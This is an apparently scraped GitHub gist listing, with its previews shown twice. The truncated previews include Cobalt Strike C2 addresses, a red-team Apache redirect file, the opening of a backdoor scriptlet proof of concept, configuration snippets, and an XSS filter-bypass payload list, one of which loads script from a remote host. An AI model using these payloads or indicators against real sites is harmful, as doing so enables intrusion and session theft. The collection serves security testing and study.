Markus Faerevaag mfaerevaag

## Cobalt Strike & Metasploit servers
Cobalt Strike & Metasploit servers


Cobalt Strike C2 sample report from http://180.215.104.226:80/j.ad
https://tria.ge/210327-65vrb1gqtj

beacon sample:
https://pasteboard.co/JUCfE6Y.jpg

180.215.105.229

## Get-KerberosKeytab.ps1
param(
    [Parameter(Mandatory)]
    [string]$Path
)

#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
#  keytab {

## rofi.cfg
rofi.kb-row-up:                      Up,Control+k,Shift+Tab,Shift+ISO_Left_Tab
rofi.kb-row-down:                    Down,Control+j
rofi.kb-accept-entry:                Control+m,Return,KP_Enter
rofi.terminal:                       mate-terminal
rofi.kb-remove-to-eol:               Control+Shift+e
rofi.kb-mode-next:                   Shift+Right,Control+Tab,Control+l
rofi.kb-mode-previous:               Shift+Left,Control+Shift+Tab,Control+h
rofi.kb-remove-char-back:            BackSpace

## .htaccess
	#
	# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#

## ilo-console.sh
#!/bin/bash

address=https://ilo.mysite.com:34043
username=Administrator
password=********

session_key=$(
  curl -fsS \
    --insecure \
    "$address/json/login_session" \

## RegisterBash.reg
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Directory\Background\shell\bash]
"Extended"=""
@="Open Bash here"

[HKEY_CLASSES_ROOT\Directory\Background\shell\bash\command]
@="ubuntu run /bin/bash"


## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[


## crypto_squirrel.txt
                                                  [38;5;95m▄[48;5;95;38;5;130m▄▄▄[38;5;95m█[49m▀[39m    [00m
╭───────────────────────╮          [38;5;95m▄▄[39m          [38;5;95m▄[48;5;95;38;5;130m▄▄[48;5;130m█[38;5;137m▄[48;5;137;38;5;95m▄[49m▀[39m      [00m
│                       │         [48;5;95;38;5;95m█[48;5;137;38;5;137m██[48;5;95m▄[49;38;5;95m▄▄▄[48;5;95;38;5;137m▄▄▄[49;38;5;95m▄▄[48;5;95;38;5;130m▄[48;5;130m███[38;5;137m▄[48;5;137m█[48;5;95;38;5;95m█[49;39m       [00m
│  Encrypt everything!  │       [38;5;95m▄[48;5;187;38;5;16m▄[48;5;16;38;5;187m▄[38;5;16m█[48;5;137;38;5;137m███[38;5;187m▄[38;5;16m▄▄[38;5;137m██[48;5;95;38;5;95m█[48;5;130;38;5;130m█████[48;5;137;38;5;137m██[48;5;95;38;5;95m█[49;39m       [00m
│                       ├────  [38;5;95m▄[48;5;95;38;5;137m▄[48;5;16m▄▄▄[48;5;137m███[48;5;16;38;5;16m█[48;5;187m▄[48;5;16m█[48;5;137;38;5;137m█[48;5;95;38;5;95m█[48;5;130;38;5;130m██████[48;5;137;38;5;137m███[48;5;95;38;5;95m█[49;39m

## etc-hosts-on-win.md

      
              1 file
            
          
              37 forks
            
          
              35 comments
            
          
              125 stars
            
          
                zenorocha
                / etc-hosts-on-win.md
            
            
              Last active
              April 11, 2024 23:07
            
              
                /etc/hosts on Windows
              
          
    1. Get your IP Address

echo `ifconfig $(netstat -nr | grep -e default -e "^0\.0\.0\.0" | head -1 | awk '{print $NF}') | grep -e "inet " | sed -e 's/.*inet //' -e 's/ .*//' -e 's/.*\://'`
2. Modify your hosts file


## xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
	Cobalt Strike & Metasploit servers


	Cobalt Strike C2 sample report from http://180.215.104.226:80/j.ad
	https://tria.ge/210327-65vrb1gqtj

	beacon sample:
	https://pasteboard.co/JUCfE6Y.jpg

	180.215.105.229
	param(
	[Parameter(Mandatory)]
	[string]$Path
	)

	#Created by Pierre.Audonnet@microsoft.com
	#
	#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
	#
	# keytab {
	rofi.kb-row-up: Up,Control+k,Shift+Tab,Shift+ISO_Left_Tab
	rofi.kb-row-down: Down,Control+j
	rofi.kb-accept-entry: Control+m,Return,KP_Enter
	rofi.terminal: mate-terminal
	rofi.kb-remove-to-eol: Control+Shift+e
	rofi.kb-mode-next: Shift+Right,Control+Tab,Control+l
	rofi.kb-mode-previous: Shift+Left,Control+Shift+Tab,Control+h
	rofi.kb-remove-char-back: BackSpace
	#
	# TO-DO: set \|DESTINATIONURL\| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#
	#!/bin/bash

	address=https://ilo.mysite.com:34043
	username=Administrator
	password=********

	session_key=$(
	curl -fsS \
	--insecure \
	"$address/json/login_session" \
	Windows Registry Editor Version 5.00

	[HKEY_CLASSES_ROOT\Directory\Background\shell\bash]
	"Extended"=""
	@="Open Bash here"

	[HKEY_CLASSES_ROOT\Directory\Background\shell\bash\command]
	@="ubuntu run /bin/bash"
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
	[38;5;95m▄[48;5;95;38;5;130m▄▄▄[38;5;95m█[49m▀[39m [00m
	╭───────────────────────╮ [38;5;95m▄▄[39m [38;5;95m▄[48;5;95;38;5;130m▄▄[48;5;130m█[38;5;137m▄[48;5;137;38;5;95m▄[49m▀[39m [00m
	│ │ [48;5;95;38;5;95m█[48;5;137;38;5;137m██[48;5;95m▄[49;38;5;95m▄▄▄[48;5;95;38;5;137m▄▄▄[49;38;5;95m▄▄[48;5;95;38;5;130m▄[48;5;130m███[38;5;137m▄[48;5;137m█[48;5;95;38;5;95m█[49;39m [00m
	│ Encrypt everything! │ [38;5;95m▄[48;5;187;38;5;16m▄[48;5;16;38;5;187m▄[38;5;16m█[48;5;137;38;5;137m███[38;5;187m▄[38;5;16m▄▄[38;5;137m██[48;5;95;38;5;95m█[48;5;130;38;5;130m█████[48;5;137;38;5;137m██[48;5;95;38;5;95m█[49;39m [00m
	│ ├──── [38;5;95m▄[48;5;95;38;5;137m▄[48;5;16m▄▄▄[48;5;137m███[48;5;16;38;5;16m█[48;5;187m▄[48;5;16m█[48;5;137;38;5;137m█[48;5;95;38;5;95m█[48;5;130;38;5;130m██████[48;5;137;38;5;137m███[48;5;95;38;5;95m█[49;39m
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>